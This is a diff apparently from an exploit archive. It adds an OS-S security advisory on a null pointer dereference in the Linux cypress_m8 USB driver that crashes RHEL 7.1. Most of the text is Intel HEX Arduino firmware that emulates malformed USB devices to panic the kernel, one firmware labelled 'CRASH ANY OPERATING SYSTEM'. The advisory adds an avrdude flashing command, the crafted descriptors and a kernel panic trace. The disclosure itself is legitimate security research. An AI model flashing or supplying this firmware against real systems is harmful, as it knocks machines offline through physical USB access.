+:10079000615030F02091F100FC0120830196F8CFE8 +:1007A000289884E680937D0508951092E9001092C0 +:1007B00071051092700590936F0580936E050895F2 +:1007C000FF920F931F93CF93DF93F82E8B01EA01D3 +:1007D000BA01C8010E94A606F80120E030E08EEFC1 +:1007E0002C173D0791F1F7FE02C0A49101C0A08132 +:1007F000609170057091710540916E0550916F0583 +:1008000064177507ACF49091E8009570E1F390914E +:10081000E80092FD1CC0A093F100A0917005B0917A +:1008200071051196AF73BB27AB2B11F48093E800D1 +:10083000A0917005B09171051196B0937105A093C8 +:1008400070052F5F3F4F3196CBCFC90102C08FEFAC +:100850009FEFDF91CF911F910F91FF9008951F920D +:100860000F920FB60F9211246F927F928F929F92E8 +:10087000AF92BF92CF92DF92EF92FF920F931F93AE +:100880002F933F934F935F936F937F938F939F9398 +:10089000AF93BF93EF93FF93CF93DF93CDB7DEB7C3 +:1008A0006297DEBFCDBF1092E9008091E80083FF20 +:1008B00046C168E0CE010A960E94C80382EF809389 +:1008C000E8009A8597FF05C08091E80080FFFCCF83 +:1008D00003C08EEF8093E800892F807609F023C152 +:1008E0008B85811105C01092F1001092F10020C19A +:1008F000282F2D7F213009F41BC1853049F48091C8 +:10090000E80080FFFCCF8C8580688093E30010C1F5 +:10091000863009F0E1C02D8508891989223009F057 +:10092000B3C0EC848E2D90E0209173053091740556 +:10093000821793070CF09FC00E94D5031F92EF927D +:100940008DE394E09F938F930E9483068CE0E89E52 +:1009500070011124E0917505F0917605EE0DFF1DF3 +:1009600089E0DE01119601900D928A95E1F7C801A8 +:100970000E94D50349E050E0BE016F5F7F4F80E0E9 +:100980000E94E0030F900F900F900F90C12CD12C7C +:10099000612C712C33E7A32E34E0B32E4AEA842E67 +:1009A00044E0942EE0917505F0917605EE0DFF1D63 +:1009B000818590E0681679060CF0BAC07F926F923C +:1009C000BF92AF920E948306E0917505F091760583 +:1009D000EE0DFF1D628573856C0D7D1D49E050E0B5 +:1009E00080E00E94E0030F900F900F900F9000E0C6 +:1009F00010E0E0917505F0917605EE0DFF1D028483 +:100A0000F385E02DEC0DFD1D818590E00817190799 +:100A10005CF51F930F939F928F920E948306E09143 +:100A20007505F0917605EE0DFF1D0284F385E02D2E +:100A3000EC0DFD1DC801880F991FA485B585A80F71 +:100A4000B91F4D915C910284F385E02DE80FF91FE9 +:100A50006081718180E00E94E0030F5F1F4F0F9063 +:100A60000F900F900F90C5CF8FEF681A780A8EE025 +:100A7000C80ED11C97CF8FED94E09F938F930E9467 +:100A800083060F900F9058C0C8012A8B0E94D5038F +:100A90002A892130C1F0233009F04EC08C851F9285 +:100AA0008F9389EF94E09F938F930E94830642E097 +:100AB00050E062E871E080E00E94E0030F900F9048 +:100AC0000F900F9035C04091000150E060E071E060 +:100AD00080E00E94E0032CC0873071F1883021F45F +:100AE00081E08093F10024C0893011F5937021F5E5 +:100AF000EDE4F1E081E021E096E38093E9002093CA +:100B0000EB0034913093EC009093ED008F5F3196C1 +:100B1000843099F78EE78093EA001092EA008C8582 +:100B20008093720505C0888999890E94D50304C005 +:100B30008EEF8093E80003C081E28093EB00629621 +:100B40000FB6F894DEBF0FBECDBFDF91CF91FF91FE +:100B5000EF91BF91AF919F918F917F916F915F9135 +:100B60004F913F912F911F910F91FF90EF90DF9048 +:100B7000CF90BF90AF909F908F907F906F900F908D +:100B80000FBE0F901F9018951F920F920FB60F92E5 +:100B900011248F939F938091E1001092E10083FFD5 +:100BA0000FC01092E90091E09093EB001092EC00DE +:100BB00092E39093ED001092720598E09093F0000C +:100BC00082FF1AC080917E05882339F080917E05CE +:100BD000815080937E05882369F080917D0588236C +:100BE00059F080917D05815080937D05811104C06D +:100BF000289A02C05D9AF1CF9F918F910F900FBEFE +:100C00000F901F901895CF93DF93CDB7DEB782E199 +:100C1000FE013596A0E0B1E001900D928A95E1F7D2 +:100C20008F89988D9093760580937505898D9A8D1F +:100C300090937405809373058B8D9C8D90937C05A8 +:100C400080937B058D8D9E8D90937A058093790599 +:100C50008F8D98A1909378058093770510927205F7 +:100C600081E08093D70080EA8093D80082E189BD3B +:100C700009B400FEFDCF61E070E080E090E00E94EA +:100C80007B0280E98093D8008CE08093E200109290 +:100C9000E000559A209ADF91CF91089581E08093EA +:100CA000E00008959091C80095FFFCCF8093CE009E +:100CB00008951092CD0087E68093CC0088E1809360 +:100CC000C9008EE08093CA0008950F931F93CF93BD +:100CD000DF93EC018C01FE0101900020E9F73197D0 +:100CE000EC1BFD0BC8018C1B9D0B8E179F0730F46E +:100CF000F80181918F010E945206EDCFDF91CF91D3 +:100D00001F910F910895CF93DF93CDB7DEB7DA959A +:100D10000FB6F894DEBF0FBECDBFFE01EB5FFE4FF6 +:100D2000419151919F0160E071E0CE0101960E94D6 +:100D30000707CE0101960E946506D3950FB6F89479 +:100D4000DEBF0FBECDBFDF91CF9108958F929F92EE +:100D5000AF92BF92CF92DF92EF92FF920F931F93C9 +:100D6000CF93DF9300D0CDB7DEB75B0122E535E04E +:100D70003F932F9389839A830E9483068981882ECB +:100D80009A81992E0F900F9000E010E08EE5E82EEA +:100D900085E0F82E91E1C92E94E0D92E0A151B05A5 +:100DA000E4F4F40181914F0190E09F938F93FF92BF +:100DB000EF920E9483060F5F1F4FC8018F70992723 +:100DC0000F900F900F900F90892B41F7DF92CF92E9 +:100DD0000E9483060F900F90E1CF81E194E09F93F2 +:100DE0008F930E9483060F900F900F900F90DF91CA +:100DF000CF911F910F91FF90EF90DF90CF90BF9018 +:100E0000AF909F908F900895F8940C94E809AEE00D +:100E1000B0E0EDE0F7E00C94BF098C01CA0146E0B8 +:100E20004C831A83098377FF02C060E070E8615049 +:100E300071097E836D83A901BC01CE0101960E94D8 +:100E400033074D815E8157FD0AC02F8138854217D7 +:100E500053070CF49A01F801E20FF31F10822E964B +:100E6000E4E00C94DB09ACE0B0E0E9E3F7E00C94DB +:100E7000B1097C016B018A01FC0117821682838112 +:100E800081FFBDC1CE0101964C01F7019381F601AE +:100E900093FD859193FF81916F01882309F4ABC184 +:100EA000853239F493FD859193FF81916F018532ED +:100EB00029F4B70190E00E941B09E7CF512C312C97 +:100EC00020E02032A0F48B3269F030F4803259F007 +:100ED000833269F420612CC08D3239F0803339F4CB +:100EE000216026C02260246023C0286021C027FD25 +:100EF00027C030ED380F3A3078F426FF06C0FAE00C +:100F00005F9E300D1124532E13C08AE0389E300DA1 +:100F10001124332E20620CC08E3221F426FD6BC1C9 +:100F2000206406C08C3611F4206802C0883641F473 +:100F3000F60193FD859193FF81916F018111C1CFDE +:100F4000982F9F7D9554933028F40C5F1F4FFFE33B +:100F5000F9830DC0833631F0833771F0833509F0A2 +:100F60005BC022C0F801808189830E5F1F4F44243B +:100F70004394512C540115C03801F2E06F0E711CDE +:100F8000F801A080B18026FF03C0652D70E002C08B +:100F90006FEF7FEFC5012C870E9410092C018301A0 +:100FA0002C852F77222E17C03801F2E06F0E711CAE +:100FB000F801A080B18026FF03C0652D70E002C05B +:100FC0006FEF7FEFC5012C870E9405092C012C854E +:100FD0002068222E830123FC1BC0832D90E048163D +:100FE0005906B0F4B70180E290E00E941B093A94E0 +:100FF000F4CFF50127FC859127FE81915F01B701B0 +:1010000090E00E941B0931103A94F1E04F1A510808 +:101010004114510471F7E5C0843611F0893639F571 +:10102000F80127FF07C060817181828193810C5F85 +:101030001F4F08C060817181882777FD8095982FA8 +:101040000E5F1F4F2F76B22E97FF09C090958095A7 +:10105000709561957F4F8F4F9F4F2068B22E2AE089 +:1010600030E0A4010E944D09A82EA81844C085377D +:1010700029F42F7EB22E2AE030E025C0F22FF97F2E +:10108000BF2E8F36C1F018F4883579F0B4C08037A0 +:1010900019F0883721F0AFC02F2F2061B22EB4FE97 +:1010A0000DC08B2D8460B82E09C024FF0AC09F2F6D +:1010B0009660B92E06C028E030E005C020E130E09F +:1010C00002C020E132E0F801B7FE07C06081718103 +:1010D000828193810C5F1F4F06C06081718180E027 +:1010E00090E00E5F1F4FA4010E944D09A82EA81882 +:1010F000FB2DFF77BF2EB6FE0BC02B2D2E7FA51428 +:1011000050F4B4FE0AC0B2FC08C02B2D2E7E05C0E0 +:101110007A2C2B2D03C07A2C01C0752C24FF0DC016 +:10112000FE01EA0DF11D8081803311F4297E09C092 +:1011300022FF06C07394739404C0822F867809F04E +:10114000739423FD13C020FF06C05A2C731418F4A7 +:10115000530C5718732C731468F4B70180E290E0B5 +:101160002C870E941B0973942C85F5CF731410F4FF +:10117000371801C0312C24FF12C0B70180E390E082 +:101180002C870E941B092C8522FF17C021FF03C05A +:1011900088E590E002C088E790E0B7010CC0822F9C +:1011A000867859F021FD02C080E201C08BE227FD64 +:1011B0008DE2B70190E00E941B09A51438F4B70135 +:1011C00080E390E00E941B095A94F7CFAA94F4019F +:1011D000EA0DF11D8081B70190E00E941B09A1106A +:1011E000F5CF332009F451CEB70180E290E00E94A0 +:1011F0001B093A94F6CFF7018681978102C08FEFE1 +:101200009FEF2C96E2E10C94CD09FC010590615012 +:1012100070400110D8F7809590958E0F9F1F08950C +:10122000FC016150704001900110D8F780959095B5 +:101230008E0F9F1F08950F931F93CF93DF93182F47 +:10124000092FEB018B8181FD03C08FEF9FEF20C041 +:1012500082FF10C04E815F812C813D814217530770 +:101260007CF4E881F9819F012F5F3F4F3983288308 +:10127000108306C0E885F985812F0995892B29F708 +:101280002E813F812F5F3F4F3F832E83812F902FF1 +:10129000DF91CF911F910F910895FA01AA2728306D +:1012A00051F1203181F1E8946F936E7F6E5F7F4F33 +:1012B0008F4F9F4FAF4FB1E03ED0B4E03CD0670FAF +:1012C000781F891F9A1FA11D680F791F8A1F911D02 +:1012D000A11D6A0F711D811D911DA11D20D009F452 +:1012E00068943F912AE0269F11243019305D319394 +:1012F000DEF6CF010895462F4770405D4193B3E07D +:101300000FD0C9F7F6CF462F4F70405D4A3318F023 +:10131000495D31FD4052419302D0A9F7EACFB4E0D4 +:10132000A6959795879577956795BA95C9F700978C +:101330006105710508959B01AC010A2E069457952D +:10134000479537952795BA95C9F7620F731F841F84 +:10135000951FA01D0895EE0FFF1F0590F491E02D3D +:1013600009942F923F924F925F926F927F928F9249 +:101370009F92AF92BF92CF92DF92EF92FF920F9324 +:101380001F93CF93DF93CDB7DEB7CA1BDB0B0FB62E +:10139000F894DEBF0FBECDBF09942A8839884888EB +:1013A0005F846E847D848C849B84AA84B984C88481 +:1013B000DF80EE80FD800C811B81AA81B981CE0F78 +:1013C000D11D0FB6F894DEBF0FBECDBFED0108955D +:0413D000F894FFCFBF +:1013D4001201000200000040AD0BEFBE000101024B +:1013E4000001220342006100640020004200410029 +:1013F40042004500250078002500780025006E0095 +:1014040025007000180342004100440020004300FE +:10141400300046004600450045002100120100024C +:10142400000000400D050901000101020301090249 +:10143400270001010000FA0705810304040C0705D5 +:10144400010204000C0705820104000C07000700D8 +:101454000700480100500072006F006C00690066CC +:101464000069006300000A550000006BFD180A00C3 +:10147400809F0AB901312B940A8101128946001315 +:10148400000257028B0A5E0AF80A5F01F212010099 +:1014940002010000400D055702000101020301B9D9 +:1014A4000A0100F80A5F0A810A220342006100640B +:1014B400002000420041004200450025007800253C +:1014C40000780025006E00250070001803420041DA +:1014D400004400200043003000460046004500451B +:1014E40000210012010002010000400D0557020016 +:1014F400010102030109040000030100000003F2DA +:101504000AEC0A0902270001010000FA01AB0A09EA +:101514000400000301000000090200202020202014 +:101524005F5F5F5F5F5F5F5F2020202020202020BF +:1015340020202020202020202020202020202020A7 +:1015440020205F5F5F5F5F205F5F20205F2020209F +:101554002020205F5F0A0D00202020202F205F5FC5 +:101564005F5F2F202F5F20205F5F5F5F205F5F5FE3 +:101574005F5F20205F5F5F5F5F20202020202F209F +:101584005F5F5F2F2F202F5F285F295F5F5F5F2FD3 +:10159400202F5F5F0A0D002020202F202F202020E5 +:1015A4002F205F5F205C2F205F5F20602F205F5F14 +:1015B400205C2F205F5F5F2F5F5F5F5F205C5F5F5A +:1015C400205C2F205F5F2F202F205F5F5F2F202F55 +:1015D4002F5F2F0A0D0020202F202F5F5F5F2F2009 +:1015E4002F202F202F202F5F2F202F202F5F2F2001 +:1015F400285F5F2020292F5F5F5F2F205F5F2F20F0 +:101604002F202F5F2F202F202F5F5F2F202C3C0AAD +:101614000D0020205C5F5F5F5F2F5F2F202F5F2F07 +:101624005C5F5F2C5F2F5C5F5F5F5F2F5F5F5F5F5F +:101634002F20202020202F5F5F5F5F2F5C5F5F2FB4 +:101644005F2F5C5F5F5F2F5F2F7C5F7C0A0D002044 +:101654003C3C2043485241534820414E59204F506E +:1016640045524154494E472053595354454D203E09 +:101674003E0A0D00203C3C202863292053657267F4 +:10168400656A20536368756D696C6F20323031353B +:101694002C204F70656E536F7572636520536563BC +:1016A40075726974792052616C66205370656E6E30 +:1016B4006562657267203E3E0A0D000A3E3E205078 +:1016C4007265737320627574746F6E20746F207307 +:1016D4007461727420657865637574696F6E2E2EFB +:1016E4002E0A0D005B44454255475D2045786563ED +:1016F400757465207061796C6F616420300A0D0027 +:10170400526563762D446174613A0A0D005B444569 +:101714004255475D200953656E6420436F6E6669C8 +:101724006775726174696F6E44657363726970740E +:101734006F720928696E6465783A2569292E2E2E00 +:101744000D0A005B44454255475D200953656E64AC +:1017540020496E74657266616365204465736372C3 +:101764006970746F720928696E7465726661636565 +:101774003A2569292E2E2E0D0A005B444542554711 +:101784005D200953656E6420456E64706F696E74E4 +:101794002044657363726970746F720928656E649E +:1017A400706F696E743A2569292E2E2E0D0A005B1E +:1017B40044454255475D203C3C70616E6963206D31 +:1017C4006F64653F3E3E0D0A005B44454255475DEC +:1017D4002009203E3E20537472696E67204465736D +:1017E40063726970746F72207265717565737420A9 +:1017F4002D2073656E64696E67206D616C666F720F +:101804006D656420737472696E67212073657475E5 +:10181400702E7756616C75654C203D3D2025690D11 +:101824000A005B48455844554D505D0A0D0025306B +:041834003258200006 +:00000001FF +-- \ No newline at end of file diff --git a/platforms/linux/dos/39542.txt b/platforms/linux/dos/39542.txt new file mode 100755 index 000000000..852522757 --- /dev/null +++ b/platforms/linux/dos/39542.txt @@ -0,0 +1,646 @@ +OS-S Security Advisory 2016-07 +Linux cypress_m8 Nullpointer Dereference + +Date: March 4th, 2016 +Authors: Sergej Schumilo, Hendrik Schwartke, Ralf Spenneberg +CVE: not yet assigned +CVSS: 4.9 (AV:L/AC:L/Au:N/C:N/I:N/A:C) +Title: Local RedHat Enterprise Linux DoS â?? RHEL 7.1 Kernel crashes on invalid +USB device descriptors (cypress_m8 driver) +Severity: Critical. The Kernel panics. A reboot is required. +Ease of Exploitation: Trivial +Vulnerability type: Wrong input validation +Products: RHEL 7.1 including all updates +Kernel-Version: 3.10.0-229.20.1.el7.x86_64 (for debugging-purposes we used the +CentOS Kernel kernel-debuginfo-3.10.0-229.14.1.el7) +Vendor: Red Hat +Vendor contacted: November, 12th 2015 +PDF of Advisory: https://os-s.net/advisories/OSS-2016-07_cypress_m8.pdf + +Abstract: +The Kernel 3.10.0-229.20.1.el7.x86_64 crashes on presentation of a buggy USB +device which requires the requiring the cypress_m8 driver. + +Detailed product description: +We confirmed the bug on the following system: +RHEL 7.1 +Kernel 3.10.0-229.20.1.el7.x86_64 +Further products or kernel versions have not been tested. +How reproducible: Always +Actual results: Kernel crashes. + +Description: +The bug was found using the USB-fuzzing framework vUSBf from Sergej Schumilo +(github.com/schumilo) using the following device descriptor: + +[*] Device-Descriptor +bLength: 0x12 +bDescriptorType: 0x1 +bcdUSB: 0x200 +bDeviceClass: 0x3 +bDeviceSubClass: 0x0 +bDeviceProtocol: 0x0 +bMaxPacketSize: 0x40 +idVendor: 0x4b4 +idProduct: 0x5500 +bcdDevice: 0x100 +iManufacturer: 0x1 +iProduct: 0x2 +iSerialNumbers: 0x3 +bNumConfigurations: 0x1 + +This is the configuration descriptor containing only one interrupt-endpoint- +descriptor (IN-direction). +The cypress_m8 driver assumes that there will be at least two endpoint- +descriptors configured for interrupt-transfer and each used for one direction. +Since there is no sanity check, it is possible that the kernel tries to +dereference a null-pointer. +This results in a crash of the system. + +**** +$ nm cypress_m8.ko.debug | grep cypress_generic_port_probe +00000000000008d0 t cypress_generic_port_probe +$ addr2line -e cypress_m8.ko.debug 0x9D0 +/usr/src/debug/kernel-3.10.0-229.14.1.el7/linux-3.10.0-229.14.1.el7.x86_ +64/drivers/usb/serial/cypress_m8.c:488 +**** + +**** CentOS-Kernel linux-3.10.0-229.14.1.el7 (drivers/usb/serial/cypress_m8.c) +... +482 if (interval > 0) { +483 priv->write_urb_interval = interval; +484 priv->read_urb_interval = interval; +485 dev_dbg(&port->dev, "%s - read & write intervals forced to %d\n", +486 __func__, interval); +487 } else { +488 priv->write_urb_interval = port->interrupt_out_urb->interval; /* +possible null-pointer dereference */ +489 priv->read_urb_interval = port->interrupt_in_urb->interval; /* +possible null-pointer dereference */ +490 dev_dbg(&port->dev, "%s - intervals: read=%d write=%d\n", +491 __func__, priv->read_urb_interval, +492 priv->write_urb_interval); +493 } +... +**** + +[*] Configuration-Descriptor +bLength: 0x9 +bDescriptorType: 0x2 +wTotalLength: 0x27 +bNumInterfaces: 0x1 +bConfigurationValue: 0x1 +iConfiguration: 0x0 +bmAttributes: 0x0 +bMaxPower: 0x31 +[*] Interface-Descriptor +bLength: 0x9 +bDescriptorType: 0x4 +bInterfaceNumber: 0x0 +bAlternateSetting: 0x0 +bNumEndpoints: 0x3 +bInterfaceClass: 0x0 +bInterfaceSubClass: 0x0 +bInterfaceProtocol: 0x0 +[*] Endpoint-Descriptor: +bLength: 0x7 +bDescriptorType: 0x5 +bEndpointAddress: 0x81 ï?? IN-Direction +bmAttribut: 0x3 ï?? Interrupt-Transfer +wMaxPacketSize: 0x404 +bInterval: 0xc +[*] Endpoint-Descriptor: +bLength: 0x7 +bDescriptorType: 0x5 +bEndpointAddress: 0x1 ï??OUT-Direction +bmAttribut: 0x2 ï??Bulk-Transfer +wMaxPacketSize: 0x4 +bInterval: 0xc +[*] Endpoint-Descriptor: +bLength: 0x7 +bDescriptorType: 0x5 +bEndpointAddress: 0x82 ï??IN-Direction +bmAttribut: 0x1 ï??Bulk-Transfer +wMaxPacketSize: 0x4 +bInterval: 0xc + +Proof of Concept: +For a proof of concept, we are providing an Arduino Leonardo firmware file. This +firmware will emulate the defective USB device. + +avrdude -v -p ATMEGA32u4 -c avr109 -P /dev/ttyACM0 -b 57600 -U +flash:w:binary.hex + +The firmware has been attached to this bug report. +To prevent the automated delivery of the payload, a jumper may be used to +connect port D3 and 3V3! + +Severity and Ease of Exploitation: +The vulnerability can be easily exploited. Using our Arduino Leonardo firmware, +only physical access to the system is required. + +Vendor Communication: +We contacted Red Hat on the November, 12th 2015. +To this day, no security patch was provided by the vendor. +Since our 90-day Responsible Discourse deadline is expired, we publish this +Security Advisory. + +References: +https://bugzilla.redhat.com/show_bug.cgi?id=1283368 + +Kernel Stacktrace: + +[ 40.138619] usb 1-1: new full-speed USB device number 2 using xhci_hcd +[ 40.366581] usb 1-1: New USB device found, idVendor=04b4, idProduct=5500 +[ 40.373039] usb 1-1: New USB device strings: Mfr=1, Product=2, +SerialNumber=3 +[ 40.381857] usb 1-1: Product: Ä? +[ 40.385232] usb 1-1: Manufacturer: Ä? +[ 40.389227] usb 1-1: SerialNumber: % +[ 40.397815] usb 1-1: ep 0x81 - rounding interval to 64 microframes, ep desc +says 96 microframes +[ 40.457689] usbcore: registered new interface driver cypress_m8 +[ 40.469365] usbserial: USB Serial support registered for DeLorme Earthmate +USB +[ 40.480135] usbserial: USB Serial support registered for HID->COM RS232 +Adapter +[ 40.494974] usbserial: USB Serial support registered for Nokia CA-42 V2 +Adapter +[ 40.502183] cypress_m8 1-1:1.0: HID->COM RS232 Adapter converter detected +[ 40.512683] BUG: unable to handle kernel NULL pointer dereference at +00000000000000a8 +[ 40.513393] IP: [] cypress_generic_port_probe+0x100/0x1a0 +[cypress_m8] +[ 40.513393] PGD 0 +[ 40.513393] Oops: 0000 [#1] SMP +[ 40.513393] Modules linked in: cypress_m8(+) ip6t_rpfilter ip6t_REJECT +ipt_REJECT xt_conntrack ebtable_nat ebtable_broute bridge stp llc +ebtable_filter ebtables ip6table_nat nf_conntrack_ipv6 nf_defrag_ipv6 +nf_nat_ipv6 ip6table_mangle ip6table_security ip6table_raw ip6table_filter +ip6_tables iptable_nat nf_conntrack_ipv4 nf_defrag_ipv4 nf_nat_ipv4 nf_nat +nf_conntrack iptable_mangle iptable_security iptable_raw iptable_filter +ip_tables bochs_drm ppdev syscopyarea sysfillrect sysimgblt ttm drm_kms_helper +drm pcspkr i2c_piix4 i2c_core serio_raw parport_pc parport xfs libcrc32c +sd_mod sr_mod crc_t10dif cdrom crct10dif_common ata_generic pata_acpi ata_piix +libata e1000 floppy dm_mirror dm_region_hash dm_log dm_mod +[ 40.513393] CPU: 0 PID: 2220 Comm: systemd-udevd Not tainted +3.10.0-229.14.1.el7.x86_64 #1 +[ 40.513393] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS +rel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014 +[ 40.513393] task: ffff88000bcfa220 ti: ffff88000bd20000 task.ti: ffff88000bd20000 +[ 40.513393] RIP: 0010:[] [] +cypress_generic_port_probe+0x100/0x1a0 [cypress_m8] +[ 40.513393] RSP: 0018:ffff88000bd238d0 EFLAGS: 00010246 +[ 40.513393] RAX: 0000000000000000 RBX: ffff88000c5149c0 RCX: ffff88000bd23fd8 +[ 40.513393] RDX: 0000000000000000 RSI: ffffffff81447840 RDI: ffff88000aeff040 +[ 40.513393] RBP: ffff88000bd238f0 R08: 0000000000000000 R09: ffff88000fc16380 +[ 40.513393] R10: ffffea000030eb00 R11: ffffffff8141968b R12: ffff88000bcd3800 +[ 40.513393] R13: 0000000000000000 R14: ffff88000bcd3ab0 R15: ffffffffa0396200 +[ 40.513393] FS: 00007fb8082b4880(0000) GS:ffff88000fc00000(0000) +knlGS:0000000000000000 +[ 40.513393] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b +[ 40.513393] CR2: 00000000000000a8 CR3: 000000000c572000 CR4: +00000000000006f0 +[ 40.513393] DR0: 0000000000000000 DR1: 0000000000000000 DR2: +0000000000000000 +[ 40.513393] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 +[ 40.513393] Stack: +[ 40.513393] ffff88000bcd3ab0 ffff88000bcd3800 ffff88000bcd3800 ffffffffa0396200 +[ 40.513393] ffff88000bd23910 ffffffffa0393b04 ffff88000bcd3ab0 0000000000000000 +[ 40.513393] ffff88000bd23940 ffffffff81461cf6 ffff88000bcd3ab0 ffff88000bcd3ab0 +[ 40.513393] Call Trace: +[ 40.513393] [] cypress_hidcom_port_probe+0x14/0x80 +[cypress_m8] +[ 40.513393] [] usb_serial_device_probe+0x56/0x110 +[ 40.513393] [] driver_probe_device+0x87/0x390 +[ 40.513393] [] ? driver_probe_device+0x390/0x390 +[ 40.513393] [] __device_attach+0x3b/0x40 +[ 40.513393] [] bus_for_each_drv+0x6b/0xb0 +[ 40.513393] [] device_attach+0x88/0xa0 +[ 40.513393] [] bus_probe_device+0x98/0xc0 +[ 40.513393] [] device_add+0x4c4/0x7a0 +[ 40.513393] [] usb_serial_probe+0x1123/0x1230 +[ 40.513393] [] ? ida_get_new_above+0x7c/0x2a0 +[ 40.513393] [] ? kmem_cache_alloc+0x1ba/0x1d0 +[ 40.513393] [] ? sysfs_addrm_finish+0x42/0xe0 +[ 40.513393] [] ? __sysfs_add_one+0x61/0x100 +[ 40.513393] [] usb_probe_interface+0x1c4/0x2f0 +[ 40.513393] [] driver_probe_device+0x87/0x390 +[ 40.513393] [] __driver_attach+0x93/0xa0 +[ 40.513393] [] ? __device_attach+0x40/0x40 +[ 40.513393] [] bus_for_each_dev+0x73/0xc0 +[ 40.513393] [] driver_attach+0x1e/0x20 +[ 40.513393] [] usb_serial_register_drivers+0x29b/0x580 +[ 40.513393] [] ? 0xffffffffa0398fff +[ 40.513393] [] usb_serial_module_init+0x1e/0x1000 +[cypress_m8] +[ 40.513393] [] do_one_initcall+0xb8/0x230 +[ 40.513393] [] load_module+0x133e/0x1b40 +[ 40.513393] [] ? ddebug_proc_write+0xf0/0xf0 +[ 40.513393] [] ? copy_module_from_fd.isra.42+0x53/0x150 +[ 40.513393] [] SyS_finit_module+0xa6/0xd0 +[ 40.513393] [] system_call_fastpath+0x16/0x1b +[ 40.513393] Code: 03 e1 41 c7 84 24 38 01 00 00 00 01 00 00 5b 41 5c 44 89 +e8 41 5d 41 5e 5d c3 90 49 8b 84 24 78 01 00 00 4d 8d b4 24 b0 02 00 00 <44> +8b 88 a8 00 00 00 44 89 4b 34 49 8b 84 24 58 01 00 00 44 8b +[ 40.513393] RIP [] cypress_generic_port_probe+0x100/0x1a0 +[cypress_m8] +[ 40.513393] RSP +[ 40.513393] CR2: 00000000000000a8 +[ 41.005529] ---[ end trace b239663354a1c556 ]--- +[ 41.010284] Kernel panic - not syncing: Fatal exception +[ 41.011253] drm_kms_helper: panic occurred, switching back to text console + +Arduino Leonardo Firmware: + +:100000000C94A8000C94C5000C94C5000C94C50079 +:100010000C94C5000C94C5000C94C5000C94C5004C +:100020000C94C5000C94C5000C94C4050C942F04CA +:100030000C94C5000C94C5000C94C5000C94C5002C +:100040000C94C5000C94C5000C94C5000C94C5001C +:100050000C94C5000C94C5000C94C5000C940E02C1 +:100060000C94C5000C94C5000C94C5000C94C500FC +:100070000C94C5000C94C5000C94C5000C94C500EC +:100080000C94C5000C94C5000C94C5000C94C500DC +:100090000C94C5000C94C5000C94C5000C94C500CC +:1000A0000C94C5000C94C5000C94C5000B030E0302 +:1000B000010305032F032F032F03120316031A0353 +:1000C000200324032F032A030000000200080E006F +:1000D00000030401000B000000000000000000000D +:1000E00000000000000004080201104080401020C1 +:1000F00040804080080204018040201002011080EE +:100100001020404004040404040304050202020217 +:1001100004030202020206060606060604040202A0 +:100120000204000000002300260029002C002F00FC +:1001300000000000250028002B002E0031000000E8 +:100140000000240027002A002D00300000C180811B +:1001500011241FBECFEFDAE0DEBFCDBF15E0A0E077 +:10016000B1E0E4EDF3E102C005900D92A436B107D1 +:10017000D9F725E0A4E6B5E001C01D92AF37B2077C +:10018000E1F70E94C8000C9404070C940000089545 +:10019000CF93DF93CDB7DEB7CD59D1090FB6F89421 +:1001A000DEBF0FBECDBF0E94A1020E94C70060E06B +:1001B00083E00E94300361E087E00E94300361E049 +:1001C00088E00E9430030E9459067E012AE9E20E6F +:1001D000F11C84E093E0D70111969C938E9389E003 +:1001E00094E013969C938E93129782E2E2E1F1E001 +:1001F0009E012F5F3F4F6901D90101900D928A95B1 +:10020000E1F788E1E4E3F1E0DE01939601900D92DD +:100210008A95E1F782E1ECE4F1E0DE01DB96019002 +:100220000D928A95E1F789E0EEE5F1E0DE01A05953 +:10023000BF4F01900D928A95E1F72A593F4F99E0FF +:10024000992ED901E92D1D92EA95E9F78E010957FA +:100250001F4F87E0E7E6F1E0D80101900D928A9503 +:10026000E1F7BE0160587F4F87E0EEE6F1E0DB0189 +:1002700001900D928A95E1F7AE0147585F4F87E0F4 +:10028000E5E7F1E0DA0101900D928A95E1F75E0170 +:10029000FEE8AF0EB11C86E0ECE7F1E0D50101907D +:1002A0000D928A95E1F7CE01835B9F4FEEE0DC0172 +:1002B0001D92EA95E9F7E3E0DC011996EC93D90188 +:1002C0009C92F4E01196FC9311971496EC93F9012B +:1002D000DC01292D01900D922A95E1F7FE01EC56E3 +:1002E000FF4FDC011B96FC93EE931A971D96BC9270 +:1002F000AE921C971183008373836283558344837A +:100300000C5211092CE0F80111922A95E9F721E02D +:10031000D80119962C931997FE01E059FF4F0190CF +:100320000D929A94E1F7F8019387828761E088E063 +:100330000E9469038BE492E00E94650688E892E0DF +:100340000E94650687EC92E00E94650686E093E0D5 +:100350000E94650682E493E00E9465068FE793E0C1 +:100360000E94650684EA93E00E9465068BEE93E0A6 +:100370000E94650683E00E949F03892B09F047C015 +:100380005E01F3E2AF0EB11C8824839482E1982EC3 +:1003900084E194E00E946506BF92AF92DF92CF9213 +:1003A000FF92EF921F928F921F930F932DB73EB73C +:1003B000225131090FB6F8943EBF0FBE2DBFADB725 +:1003C000BEB71196FE01FB96892D01900D928A957C +:1003D000E1F78DE695E00E94030668E873E180E0AE +:1003E00090E00E947B028DE695E00E944E0660E060 +:1003F00087E00E94690368E873E180E090E00E9472 +:100400007B020FB6F894DEBF0FBECDBFC1CF6AE04E +:1004100070E080E090E00E947B02ACCF1F920F92D0 +:100420000FB60F9211242F933F938F939F93AF9307 +:10043000BF938091650590916605A0916705B09185 +:1004400068053091640523E0230F2D3720F40196D1 +:10045000A11DB11D05C026E8230F0296A11DB11DE7 +:10046000209364058093650590936605A0936705C6 +:10047000B09368058091690590916A05A0916B051C +:10048000B0916C050196A11DB11D809369059093F3 +:100490006A05A0936B05B0936C05BF91AF919F91D6 +:1004A0008F913F912F910F900FBE0F901F90189535 +:1004B0003FB7F8948091690590916A05A0916B050A +:1004C000B0916C0526B5A89B05C02F3F19F0019689 +:1004D000A11DB11D3FBF6627782F892F9A2F620F6C +:1004E000711D811D911D42E0660F771F881F991FA6 +:1004F0004A95D1F70895CF92DF92EF92FF92CF9372 +:10050000DF936B017C010E945802EB01C114D104FE +:10051000E104F10479F00E9458026C1B7D0B683EE7 +:100520007340A0F381E0C81AD108E108F108C8516E +:10053000DC4FECCFDF91CF91FF90EF90DF90CF9029 +:100540000895789484B5826084BD84B5816084BD4B +:1005500085B5826085BD85B5816085BDEEE6F0E03C +:10056000808181608083E1E8F0E010828081826098 +:100570008083808181608083E0E8F0E08081816019 +:100580008083E1E9F0E08081826080838081816006 